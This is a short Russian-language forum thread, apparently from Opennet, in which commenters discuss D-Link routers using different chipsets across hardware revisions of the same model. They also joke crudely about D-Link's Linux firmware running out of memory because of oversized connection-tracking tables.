Да, у D-Link в разных хардварных версиях одной и той же модели могут стоять совершенно разные чипы. Эта прошивка работает на разных RaLink чипсетах.
> Да, у D-Link в разных хардварных версиях одной и той же модели
> могут стоять совершенно разные чипы.Фаготы, блин: названий моделей им мало - на 1 название по три железки. Может они конечно так воркэраундят всякий местный булшит типа сертификаций, но продавать совершенно разные железки под одной маркой - по любому кривая практика. И сертификаторам стоило бы заинтересоваться таким на...ловом, если уж на то пошло. Т.к. по сути попахивает каким-то мошенничеством.
Казалось бы, причём тут Opennet?
Угадай, какая операционка в длинках, а так же с чем едять busybox, и где ноги у lighttpd?!
> Угадай, какая операционка в длинкахwin95?!
Не, эти ж@порукие идиоты умудрились линукс до такого состояния довести. Обычно путем указания таблицы контрека крупнее чем в девайсе вообще оперативы есть. Так что при активном использовании сети у девайса кончается память. И откусить негде - ну не будет же OOM killer убивать ядро, сожравшее всю память на трекинг соединений?! :)
> ну не будет же OOM killer убивать ядро, сожравшее
> всю память на трекинг соединений?! :)breaking news! linux kernel покончил самоубийством, обнаружив, что его собирали инженеры d-link!